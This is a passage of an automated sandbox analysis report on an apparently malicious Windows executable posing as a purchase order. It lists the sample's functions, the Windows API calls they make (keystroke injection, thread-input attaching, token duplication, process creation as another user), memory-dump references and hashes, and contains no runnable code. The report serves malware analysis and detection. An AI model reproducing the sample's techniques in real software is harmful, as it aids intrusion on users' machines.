                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                  • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                  • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                  • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                  Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00444B34
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _malloc_memmove
                                  • String ID:
                                  • API String ID: 1183979061-0
                                  • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                  • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                  Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __lock_file
                                  • String ID:
                                  • API String ID: 3031932315-0
                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                  Function 00428905 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _memmove.LIBCMT ref: 00428939
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                                  • String ID:
                                  • API String ID: 620504543-0
                                  • Opcode ID: c9c70bfe2459166c40d63b9fe27fba0aac42174d62b0a7f28c569f684cc4c908
                                  • Instruction ID: c2064c2796ab03ff69418e3c62d92c7a192424b86f475a5c46dd96dfc8171558
                                  • Opcode Fuzzy Hash: c9c70bfe2459166c40d63b9fe27fba0aac42174d62b0a7f28c569f684cc4c908
                                  • Instruction Fuzzy Hash: 27011DB46005509FDB00DF5DD891F5677A1AF8A308F14819DE2098F366DA36E846CB92
                                  Function 00479714 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                    • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                    • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                  • VariantClear.OLEAUT32(?), ref: 0047973E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$CopyInit
                                  • String ID:
                                  • API String ID: 24293632-0
                                  • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                  • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                  • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                  • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                  Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wfsopen
                                  • String ID:
                                  • API String ID: 197181222-0
                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                  Function 04002310 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000001F4), ref: 04002321
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                  • Instruction ID: fe2b4b53cbb11c3bad8e25d0b9afe2b9212ed6a8d50cd73d1ce58594c6b5a87f
                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                  • Instruction Fuzzy Hash: 2DE0E67494010DDFDB00EFB4D54D6DE7FB4EF04301F1045A5FD01E2281D6309E508A62

                                  Non-executed Functions

                                  Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardnativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                  • NtdllDialogWndProc_W.USER32(?,0000004E,?,?), ref: 0047C8FC
                                  • GetKeyState.USER32(00000011), ref: 0047C92D
                                  • GetKeyState.USER32(00000009), ref: 0047C936
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                  • GetKeyState.USER32(00000010), ref: 0047C953
                                  • 742845F0.USER32(00000002,000000F0), ref: 0047C967
                                  • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                  • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                  • _wcsncpy.LIBCMT ref: 0047CA29
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                  • SendMessageW.USER32 ref: 0047CA7F
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                  • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                  • 6FE0CB00.COMCTL32(00C368F0,00000000,00000000,00000000), ref: 0047CB9B
                                  • 6FE0C2F0.COMCTL32(00C368F0,00000000,000000F8,000000F0), ref: 0047CBAC
                                  • SetCapture.USER32(?), ref: 0047CBB6
                                  • ClientToScreen.USER32(?,?), ref: 0047CC17
                                  • 6FE0C530.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                  • ReleaseCapture.USER32 ref: 0047CC3A
                                  • GetCursorPos.USER32(?), ref: 0047CC72
                                  • ScreenToClient.USER32(?,?), ref: 0047CC80
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                  • SendMessageW.USER32 ref: 0047CD12
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                  • SendMessageW.USER32 ref: 0047CD80
                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                  • GetCursorPos.USER32(?), ref: 0047CDC8
                                  • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                  • GetParent.USER32(00000000), ref: 0047CDF7
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                  • SendMessageW.USER32 ref: 0047CE93
                                  • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,019E1CA8,00000000,?,?,?,?), ref: 0047CF1C
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                  • SendMessageW.USER32 ref: 0047CF6B
                                  • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,019E1CA8,00000000,?,?,?,?), ref: 0047CFE6
                                  • 742845F0.USER32(?,000000F0), ref: 0047D086
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$ClientScreen$State$742845CaptureCursorMenuPopupTrack$C530DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                  • String ID: @GUI_DRAGID$F
                                  • API String ID: 144575006-4164748364
                                  • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                  • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                  • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                  • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                  Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00434420
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                  • IsIconic.USER32(?), ref: 0043444F
                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                  • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                  • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 2889586943-2988720461
                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                  Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                  • _wcslen.LIBCMT ref: 00446498
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _wcsncpy.LIBCMT ref: 004464C0
                                  • 74FD5590.USERENV(?,00000020), ref: 004464D9
                                  • 74FD7ED0.USERENV(?,?,00000000), ref: 004464F3
                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                  • 74FD5030.USERENV(?,?), ref: 00446555
                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                  • CloseDesktop.USER32(?), ref: 0044657A
                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                  • 74FD7F30.USERENV(?), ref: 004465A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: StationWindow$CloseProcess$DesktopHandleOpen$CreateD5030D5590DuplicateTokenUser_malloc_wcslen_wcsncpy
                                  • String ID: $@OH$default$winsta0
                                  • API String ID: 2978692741-3791954436
                                  • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                  • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                  Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                  • FindClose.KERNEL32(00000000), ref: 00478924
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                  • __swprintf.LIBCMT ref: 004789D3
                                  • __swprintf.LIBCMT ref: 00478A1D
                                  • __swprintf.LIBCMT ref: 00478A4B
                                  • __swprintf.LIBCMT ref: 00478A79
                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                    • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                  • __swprintf.LIBCMT ref: 00478AA7
                                  • __swprintf.LIBCMT ref: 00478AD5
                                  • __swprintf.LIBCMT ref: 00478B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                  • API String ID: 999945258-2428617273
                                  • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                  • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                  • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                  • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                  Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                  • __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscpy.LIBCMT ref: 004034A7
                                  • _wcscat.LIBCMT ref: 004034BC
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                  • _wcscpy.LIBCMT ref: 004035A0
                                  • _wcslen.LIBCMT ref: 00403623
                                  • _wcslen.LIBCMT ref: 0040367D
                                  Strings
                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                  • Error opening the file, xrefs: 00428231
                                  • _, xrefs: 0040371C
                                  • Unterminated string, xrefs: 00428348
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                  • API String ID: 3393021363-188983378
                                  • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                  • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                  Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                  • GetFocus.USER32 ref: 0046A0DD
                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
